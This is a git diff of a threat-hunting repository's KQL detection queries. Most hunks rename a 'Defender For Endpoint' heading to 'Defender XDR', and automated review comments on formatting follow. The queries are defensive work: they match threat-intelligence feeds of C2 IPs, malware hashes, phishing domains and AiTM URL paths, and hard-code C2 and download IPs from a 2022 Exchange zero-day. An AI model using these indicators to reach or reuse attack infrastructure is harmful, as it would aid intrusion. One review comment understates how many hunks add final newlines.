diff --git a/Threat Hunting/Ransomware - LeaksiteMontitoring.md b/Threat Hunting/Ransomware - LeaksiteMontitoring.md index ab49028..5920adc 100644 --- a/Threat Hunting/Ransomware - LeaksiteMontitoring.md +++ b/Threat Hunting/Ransomware - LeaksiteMontitoring.md @@ -27,7 +27,7 @@ Relevant third parties, suppliers, or clients could be compromised and present a - [Microsoft Sentinel External Data Operator](https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/externaldata-operator?pivots=azuredataexplorer) - [Ransomware Live](https://ransomware.live/#/) -## Defender For Endpoint & Sentinel +## Defender XDR & Sentinel ```KQL //basic KQL to query recentvictims API let victims = externaldata(country:string, diff --git a/Threat Hunting/STORM-0539 URLPathsEmail.md b/Threat Hunting/STORM-0539 URLPathsEmail.md index 1e1cec3..80ccb5d 100644 --- a/Threat Hunting/STORM-0539 URLPathsEmail.md +++ b/Threat Hunting/STORM-0539 URLPathsEmail.md @@ -23,7 +23,7 @@ These URLs lead to adversary-in-the-middle (AiTM) pages that allow Storm-0539 to #### References - https://twitter.com/MsftSecIntel/status/1735351713907773711 -## Defender For Endpoint +## Defender XDR ```KQL let URLs = dynamic([@'/Udlaps/', @'/Usrlop/', @'/adls/index.html', @'/saml2/index.html']); EmailUrlInfo @@ -36,4 +36,4 @@ let URLs = dynamic([@'/Udlaps/', @'/Usrlop/', @'/adls/index.html', @'/saml2/inde EmailUrlInfo | where Url has_any (URLs) | join EmailEvents on NetworkMessageId -``` \ No newline at end of file +``` diff --git a/Threat Hunting/TI Feed - 2022-TalosEmotetDomain.md b/Threat Hunting/TI Feed - 2022-TalosEmotetDomain.md index 62d77ee..551c6ae 100644 --- a/Threat Hunting/TI Feed - 2022-TalosEmotetDomain.md +++ b/Threat Hunting/TI Feed - 2022-TalosEmotetDomain.md 
@@ -4,7 +4,7 @@ #### Feed information: https://blog.talosintelligence.com/emotet-coming-in-hot/ #### Feed link: https://github.com/Cisco-Talos/IOCs/blob/main/2022/11/Emotet_contacted_domains.txt -### Defender For Endpoint +### Defender XDR ``` let EmotetDomain = externaldata(Domain: string)[@"https://raw.githubusercontent.com/Cisco-Talos/IOCs/main/2022/11/Emotet_contacted_domains.txt"] with (format="txt", ignoreFirstRecord=True); DeviceNetworkEvents diff --git a/Threat Hunting/TI Feed - 2022-TalosEmotetSHA256.md b/Threat Hunting/TI Feed - 2022-TalosEmotetSHA256.md index 8ea4e73..98c861b 100644 --- a/Threat Hunting/TI Feed - 2022-TalosEmotetSHA256.md +++ b/Threat Hunting/TI Feed - 2022-TalosEmotetSHA256.md @@ -4,7 +4,7 @@ #### Feed information: https://blog.talosintelligence.com/emotet-coming-in-hot/ #### Feed link: https://github.com/Cisco-Talos/IOCs/blob/main/2022/11/Emotet_parents.txt -### Defender For Endpoint +### Defender XDR ``` let Emotetsha256 = externaldata(sha256: string)[@"https://githubraw.com/Cisco-Talos/IOCs/main/2022/11/Emotet_parents.txt"] with (format="txt", ignoreFirstRecord=True); DeviceFileEvents diff --git a/Threat Hunting/TI Feed - AbuseCHBotnetC2Indicators.md b/Threat Hunting/TI Feed - AbuseCHBotnetC2Indicators.md index 6a4fb86..373fc99 100644 --- a/Threat Hunting/TI Feed - AbuseCHBotnetC2Indicators.md +++ b/Threat Hunting/TI Feed - AbuseCHBotnetC2Indicators.md @@ -4,7 +4,7 @@ #### Feed information: https://feodotracker.abuse.ch/blocklist/ #### Feed link: https://feodotracker.abuse.ch/downloads/ipblocklist.txt -### Defender For Endpoint +### Defender XDR ``` let BotnetIP = externaldata(IP: string)[@"https://feodotracker.abuse.ch/downloads/ipblocklist.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; @@ -53,4 +53,4 @@ DeviceNetworkEvents DeviceName, InitiatingProcessCommandLine, InitiatingProcessFolderPath -``` \ No newline at end of file +``` 
diff --git a/Threat Hunting/TI Feed - AbuseCHIPBlacklistFeed.md b/Threat Hunting/TI Feed - AbuseCHIPBlacklistFeed.md index c9bbfdc..0bc6b86 100644 --- a/Threat Hunting/TI Feed - AbuseCHIPBlacklistFeed.md +++ b/Threat Hunting/TI Feed - AbuseCHIPBlacklistFeed.md @@ -3,7 +3,7 @@ #### Source: Abuse.ch #### Feed link: https://sslbl.abuse.ch/blacklist/sslipblacklist.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://sslbl.abuse.ch/blacklist/sslipblacklist.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - AbuseCHMD5Malware.md b/Threat Hunting/TI Feed - AbuseCHMD5Malware.md index c1f2017..b6bbfc8 100644 --- a/Threat Hunting/TI Feed - AbuseCHMD5Malware.md +++ b/Threat Hunting/TI Feed - AbuseCHMD5Malware.md @@ -4,7 +4,7 @@ #### Feed information: https://bazaar.abuse.ch/faq/#tos #### Feed link: https://bazaar.abuse.ch/export/txt/md5/recent/ -### Defender For Endpoint +### Defender XDR ``` let MalwareSampleMD5 = externaldata(MD5: string)[@"https://bazaar.abuse.ch/export/txt/md5/recent"] with (format="txt", ignoreFirstRecord=True); let MD5Regex = '[a-f0-9]{32}'; @@ -29,4 +29,4 @@ let MaliciousMD5 = materialize ( ); DeviceFileEvents | where MD5 has_any (MaliciousMD5) -``` \ No newline at end of file +``` diff --git a/Threat Hunting/TI Feed - BlocklistDEAllMaliciousIP.md b/Threat Hunting/TI Feed - BlocklistDEAllMaliciousIP.md index b4d1390..a0b32a3 100644 --- a/Threat Hunting/TI Feed - BlocklistDEAllMaliciousIP.md +++ b/Threat Hunting/TI Feed - BlocklistDEAllMaliciousIP.md 
@@ -4,7 +4,7 @@ #### Feed information: https://www.blocklist.de/en/export.html #### Feed link: https://lists.blocklist.de/lists/all.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://lists.blocklist.de/lists/all.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; @@ -33,4 +33,4 @@ DeviceNetworkEvents | where RemoteIP in (MaliciousIP) | extend GeoIPInfo = geo_info_from_ip_address(RemoteIP) | extend country = tostring(parse_json(GeoIPInfo).country), state = tostring(parse_json(GeoIPInfo).state), city = tostring(parse_json(GeoIPInfo).city), latitude = tostring(parse_json(GeoIPInfo).latitude), longitude = tostring(parse_json(GeoIPInfo).longitude) -``` \ No newline at end of file +``` diff --git a/Threat Hunting/TI Feed - C2IPFeed.md b/Threat Hunting/TI Feed - C2IPFeed.md index eceacfa..82d6cec 100644 --- a/Threat Hunting/TI Feed - C2IPFeed.md +++ b/Threat Hunting/TI Feed - C2IPFeed.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/drb-ra/C2IntelFeeds #### Feed link: https://github.com/drb-ra/C2IntelFeeds/blob/master/feeds/IPC2s-30day.csv -### Defender For Endpoint +### Defender XDR ``` let C2IntelFeeds = externaldata(IP: string, ioc:string)[@"https://raw.githubusercontent.com/drb-ra/C2IntelFeeds/master/feeds/IPC2s-30day.csv"] with (format="csv", ignoreFirstRecord=True); let IPList = C2IntelFeeds diff --git a/Threat Hunting/TI Feed - C2URLFeed.md b/Threat Hunting/TI Feed - C2URLFeed.md index 94f2d19..cbcffd0 100644 --- a/Threat Hunting/TI Feed - C2URLFeed.md +++ b/Threat Hunting/TI Feed - C2URLFeed.md 
@@ -6,7 +6,7 @@ **Preferable use the URL filter abuse detection, to prevent false positives**: [Detection](./TI%20Feed%20-%20C2URLFeedFilterAbuse.md) -### Defender For Endpoint +### Defender XDR ``` // Collect Remote data let C2IntelFeeds = externaldata(Domain: string, ioc:string, path:string, IP:string)[@"https://raw.githubusercontent.com/drb-ra/C2IntelFeeds/master/feeds/domainC2swithURLwithIP.csv"] with (format="csv", ignoreFirstRecord=True); diff --git a/Threat Hunting/TI Feed - C2URLFeedFilterAbuse.md b/Threat Hunting/TI Feed - C2URLFeedFilterAbuse.md index e9dcbfd..820eba8 100644 --- a/Threat Hunting/TI Feed - C2URLFeedFilterAbuse.md +++ b/Threat Hunting/TI Feed - C2URLFeedFilterAbuse.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/drb-ra/C2IntelFeeds #### Feed link: https://github.com/drb-ra/C2IntelFeeds/blob/master/feeds/domainC2swithURLwithIP-filter-abused.csv -### Defender For Endpoint +### Defender XDR ``` // Collect Remote data let C2IntelFeeds = externaldata(Domain: string, ioc:string, path:string, IP:string)[@"https://raw.githubusercontent.com/drb-ra/C2IntelFeeds/master/feeds/domainC2swithURLwithIP-filter-abused.csv"] with (format="csv", ignoreFirstRecord=True); diff --git a/Threat Hunting/TI Feed - CERT-FR-MISPFeed.md b/Threat Hunting/TI Feed - CERT-FR-MISPFeed.md index 6251310..3be092b 100644 --- a/Threat Hunting/TI Feed - CERT-FR-MISPFeed.md +++ b/Threat Hunting/TI Feed - CERT-FR-MISPFeed.md @@ -3,7 +3,7 @@ #### Source: CERT-FR #### Feed link: https://misp.cert.ssi.gouv.fr/feed-misp/hashes.csv -### Defender For Endpoint +### Defender XDR ``` let CERTFRFeed = externaldata (SHA1: string, threatid :string) ["https://misp.cert.ssi.gouv.fr/feed-misp/hashes.csv"]; diff --git a/Threat Hunting/TI Feed - DigitalSideDomains.md b/Threat Hunting/TI Feed - DigitalSideDomains.md index 0dc69e9..f784640 100644 --- a/Threat Hunting/TI Feed - DigitalSideDomains.md +++ b/Threat Hunting/TI Feed - DigitalSideDomains.md 
@@ -4,7 +4,7 @@ #### Feed information: https://osint.digitalside.it/ #### Feed link: https://osint.digitalside.it/Threat-Intel/lists/latestdomains.txt -### Defender For Endpoint +### Defender XDR ```KQL let ThreatIntelFeed = externaldata(Domain: string)[@"https://osint.digitalside.it/Threat-Intel/lists/latestdomains.txt"] with (format="txt", ignoreFirstRecord=True); DeviceNetworkEvents @@ -18,4 +18,4 @@ let ThreatIntelFeed = externaldata(Domain: string)[@"https://osint.digitalside.i DeviceNetworkEvents | where RemoteUrl has_any (ThreatIntelFeed) | project TimeGenerated, RemoteUrl, RemoteIP, DeviceName, InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountDomain, InitiatingProcessAccountName -``` \ No newline at end of file +``` diff --git a/Threat Hunting/TI Feed - DigitalSideIPs.md b/Threat Hunting/TI Feed - DigitalSideIPs.md index 685f6d3..d0c5188 100644 --- a/Threat Hunting/TI Feed - DigitalSideIPs.md +++ b/Threat Hunting/TI Feed - DigitalSideIPs.md @@ -4,7 +4,7 @@ #### Feed information: https://osint.digitalside.it/ #### Feed link: https://osint.digitalside.it/Threat-Intel/lists/latestips.txt -### Defender For Endpoint +### Defender XDR ```KQL let ThreatIntelFeed = externaldata(DestIP: string)[@"https://osint.digitalside.it/Threat-Intel/lists/latestips.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; @@ -34,4 +34,4 @@ DeviceNetworkEvents | extend GeoIPInfo = geo_info_from_ip_address(RemoteIP) | extend country = tostring(parse_json(GeoIPInfo).country), state = tostring(parse_json(GeoIPInfo).state), city = tostring(parse_json(GeoIPInfo).city), latitude = tostring(parse_json(GeoIPInfo).latitude), longitude = tostring(parse_json(GeoIPInfo).longitude) | project-reorder TimeGenerated, DeviceName, RemoteIP, RemotePort, InitiatingProcessAccountName -``` \ No newline at end of file +``` 
diff --git a/Threat Hunting/TI Feed - JA3Blacklist.md b/Threat Hunting/TI Feed - JA3Blacklist.md index d9da261..3dded5d 100644 --- a/Threat Hunting/TI Feed - JA3Blacklist.md +++ b/Threat Hunting/TI Feed - JA3Blacklist.md @@ -4,7 +4,7 @@ #### Feed information: https://sslbl.abuse.ch/blacklist/#ja3-fingerprints-csv #### Feed link: https://sslbl.abuse.ch/blacklist/ja3_fingerprints.csv -### Defender For Endpoint +### Defender XDR ```KQL let JA3Feed = externaldata(ja3_md5:string) [@"https://sslbl.abuse.ch/blacklist/ja3_fingerprints.csv"] with (format="txt", ignoreFirstRecord=True); // Extract JA3 Hashes From Feed diff --git a/Threat Hunting/TI Feed - MISP IPSum level 4.md b/Threat Hunting/TI Feed - MISP IPSum level 4.md index 700dddb..28c8059 100644 --- a/Threat Hunting/TI Feed - MISP IPSum level 4.md +++ b/Threat Hunting/TI Feed - MISP IPSum level 4.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/stamparm/ipsum/ #### Feed link: https://raw.githubusercontent.com/stamparm/ipsum/master/levels/4.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://raw.githubusercontent.com/stamparm/ipsum/master/levels/4.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - MISP IPSum level 5.md b/Threat Hunting/TI Feed - MISP IPSum level 5.md index 284d941..d42f2a3 100644 --- a/Threat Hunting/TI Feed - MISP IPSum level 5.md +++ b/Threat Hunting/TI Feed - MISP IPSum level 5.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/stamparm/ipsum/ #### Feed link: https://raw.githubusercontent.com/stamparm/ipsum/master/levels/5.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://raw.githubusercontent.com/stamparm/ipsum/master/levels/5.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; 
diff --git a/Threat Hunting/TI Feed - MISP IPSum level 6.md b/Threat Hunting/TI Feed - MISP IPSum level 6.md index e61ac2b..738b5a4 100644 --- a/Threat Hunting/TI Feed - MISP IPSum level 6.md +++ b/Threat Hunting/TI Feed - MISP IPSum level 6.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/stamparm/ipsum/ #### Feed link: https://raw.githubusercontent.com/stamparm/ipsum/master/levels/6.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://raw.githubusercontent.com/stamparm/ipsum/master/levels/6.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - MISP IPSum level 7.md b/Threat Hunting/TI Feed - MISP IPSum level 7.md index ce56156..ac3358a 100644 --- a/Threat Hunting/TI Feed - MISP IPSum level 7.md +++ b/Threat Hunting/TI Feed - MISP IPSum level 7.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/stamparm/ipsum/ #### Feed link: https://raw.githubusercontent.com/stamparm/ipsum/master/levels/7.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://raw.githubusercontent.com/stamparm/ipsum/master/levels/7.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - MISP IPSum level 8.md b/Threat Hunting/TI Feed - MISP IPSum level 8.md index 280ceb9..7ccb174 100644 --- a/Threat Hunting/TI Feed - MISP IPSum level 8.md +++ b/Threat Hunting/TI Feed - MISP IPSum level 8.md 
@@ -4,7 +4,7 @@ #### Feed information: https://github.com/stamparm/ipsum/ #### Feed link: https://raw.githubusercontent.com/stamparm/ipsum/master/levels/8.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://raw.githubusercontent.com/stamparm/ipsum/master/levels/8.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - MontySecurity C2 Tracker All IPs.md b/Threat Hunting/TI Feed - MontySecurity C2 Tracker All IPs.md index dc27e03..0e563aa 100644 --- a/Threat Hunting/TI Feed - MontySecurity C2 Tracker All IPs.md +++ b/Threat Hunting/TI Feed - MontySecurity C2 Tracker All IPs.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/montysecurity/C2-Tracker #### Feed link: https://raw.githubusercontent.com/montysecurity/C2-Tracker/main/data/all.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://raw.githubusercontent.com/montysecurity/C2-Tracker/main/data/all.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - ThreatfoxMalwareDomains.md b/Threat Hunting/TI Feed - ThreatfoxMalwareDomains.md index ecbf206..5423c6b 100644 --- a/Threat Hunting/TI Feed - ThreatfoxMalwareDomains.md +++ b/Threat Hunting/TI Feed - ThreatfoxMalwareDomains.md @@ -4,7 +4,7 @@ #### Feed information: https://threatfox.abuse.ch/faq/#tos #### Feed link: https://threatfox.abuse.ch/downloads/hostfile/ -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(LineInfo: string)[@"https://threatfox.abuse.ch/downloads/hostfile/"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; 
@@ -35,4 +35,4 @@ let MalwareDomains = materialize ( DeviceNetworkEvents | where RemoteUrl has_any (MalwareDomains) | project TimeGenerated, RemoteUrl, RemoteIP, DeviceName, InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountDomain, InitiatingProcessAccountName -``` \ No newline at end of file +``` diff --git a/Threat Hunting/TI Feed - ThreatviewioDomain-High-Confidence-Feed.md b/Threat Hunting/TI Feed - ThreatviewioDomain-High-Confidence-Feed.md index 9233fb4..a1e174a 100644 --- a/Threat Hunting/TI Feed - ThreatviewioDomain-High-Confidence-Feed.md +++ b/Threat Hunting/TI Feed - ThreatviewioDomain-High-Confidence-Feed.md @@ -4,7 +4,7 @@ #### Feed information: https://threatview.io/ #### Feed link: https://threatview.io/Downloads/DOMAIN-High-Confidence-Feed.txt -### Defender For Endpoint +### Defender XDR ```KQL let ThreatIntelFeed = externaldata(Domain: string)[@"https://threatview.io/Downloads/DOMAIN-High-Confidence-Feed.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - ThreatviewioIP-High-Confidence-Feed.md b/Threat Hunting/TI Feed - ThreatviewioIP-High-Confidence-Feed.md index de90f16..2754a6c 100644 --- a/Threat Hunting/TI Feed - ThreatviewioIP-High-Confidence-Feed.md +++ b/Threat Hunting/TI Feed - ThreatviewioIP-High-Confidence-Feed.md @@ -4,7 +4,7 @@ #### Feed information: https://threatview.io/ #### Feed link: https://threatview.io/Downloads/IP-High-Confidence-Feed.txt -### Defender For Endpoint +### Defender XDR ```KQL let ThreatIntelFeed = externaldata(DestIP: string)[@"https://threatview.io/Downloads/IP-High-Confidence-Feed.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - TwitterIOCs.md b/Threat Hunting/TI Feed - TwitterIOCs.md index 39a6aed..9d1a8d6 100644 --- a/Threat Hunting/TI Feed - TwitterIOCs.md 
+++ b/Threat Hunting/TI Feed - TwitterIOCs.md @@ -21,7 +21,7 @@ Source: https://tweetfeed.live/ Feed link: https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/month.csv -### Defender For Endpoint +### Defender XDR ``` // Collect external data from @0xDanielLopez Github. There is a UI for TweetFeed, this can be accessed on https://tweetfeed.live/ // TweetFeed collects Indicators of Compromise (IOCs) shared by the infosec community at Twitter. Here you will find malicious URLs, domains, IPs, and SHA256/MD5 hashes. diff --git a/Threat Hunting/TI Feed - ipfs_phishing.md b/Threat Hunting/TI Feed - ipfs_phishing.md index e46bdfd..22fc65d 100644 --- a/Threat Hunting/TI Feed - ipfs_phishing.md +++ b/Threat Hunting/TI Feed - ipfs_phishing.md @@ -26,7 +26,7 @@ The risk targeted by this detection rule is the exploitation of IPFS in phishing - [Cisco-Talos IOCs](https://github.com/Cisco-Talos/IOCs/tree/main/2022/11) - [Volexity Threat Intel](https://raw.githubusercontent.com/volexity/threat-intel/main/2023/2023-06-28%20POWERSTAR/attachments/ipfs.txt) -## Defender For Endpoint +## Defender XDR ```KQL //check for phishing emails potentially using ipfs to host malicious content used in phishing campaigns. diff --git a/Windows Security Events/ListADDelegations.md b/Windows Security Events/ListADDelegations.md index 6af1c93..a2a2f6c 100644 --- a/Windows Security Events/ListADDelegations.md +++ b/Windows Security Events/ListADDelegations.md @@ -17,4 +17,4 @@ SecurityEvent | extend AllData = tostring(parse_xml(EventData)) | extend DelegatedTo = parse_json(AllData)['EventData']['Data'][20]["#text"] | where not (DelegatedTo in (exclusions)) -``` \ No newline at end of file +``` diff --git a/Zero Day Detection/MS Exchange Zero Day Sept 2022.md b/Zero Day Detection/MS Exchange Zero Day Sept 2022.md index c44bdb9..4b98f50 100644 --- a/Zero Day Detection/MS Exchange Zero Day Sept 2022.md +++ b/Zero Day Detection/MS Exchange Zero Day Sept 2022.md 
@@ -4,7 +4,7 @@ Blog about the (unconfirmed) zero day in Exchange: [Link](https://www.gteltsc.vn -### Defender For Endpoint +### Defender XDR ``` let C2IP = '137.184.67.33'; let DownloadIP = '206.188.196.77';
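Review bot: the code-fence language tag is inconsistent across the files this template pass touches. The JA3Blacklist, ThreatviewioDomain-High-Confidence-Feed, ThreatviewioIP-High-Confidence-Feed and ipfs_phishing hunks open the query with "```KQL", while the MISP IPSum level 4 to 8, MontySecurity C2 Tracker, ThreatfoxMalwareDomains, TwitterIOCs and MS Exchange Zero Day hunks open it with a bare "```". Since every one of these hunks already rewrites the heading line directly above the fence, normalizing the tag to "```KQL" in the same change would give consistent syntax highlighting across the Threat Hunting folder at no extra review cost.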
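Review bot: heading levels do not match between files after the rename. The ipfs_phishing hunk changes "## Defender For Endpoint" to "## Defender XDR" (h2), while every other hunk in this patch produces "### Defender XDR" (h3) under "#### Feed information:" / "#### Feed link:" metadata lines. If the h2 is intentional because that file has its own section structure, a short note in the template would help; otherwise change it to "### Defender XDR" so the section renders at the same depth as the rest of the TI Feed pages.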
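Review bot: the TwitterIOCs hunk shows the feed metadata as plain lines, "Source: https://tweetfeed.live/" and "Feed link: https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/month.csv", whereas the other TI Feed files in this patch carry them as "#### Feed information:" and "#### Feed link:" headings. A template update is the natural place to align this file with the others, so consider adding the "####" prefixes (and renaming "Source:" to "Feed information:") in the same commit.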
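Review bot: the commit subject "Template Update" does not document what the template change is. The hunks show two distinct edits, renaming the "Defender For Endpoint" section heading to "Defender XDR" in every query file and adding a missing final newline in the ThreatfoxMalwareDomains and ListADDelegations hunks ("\ No newline at end of file" removed). Both are fine, but a one-line body stating the rename and its motivation (the queries run in Defender XDR advanced hunting, not only in the MDE portal) would make the history searchable for anyone later grepping for the old heading.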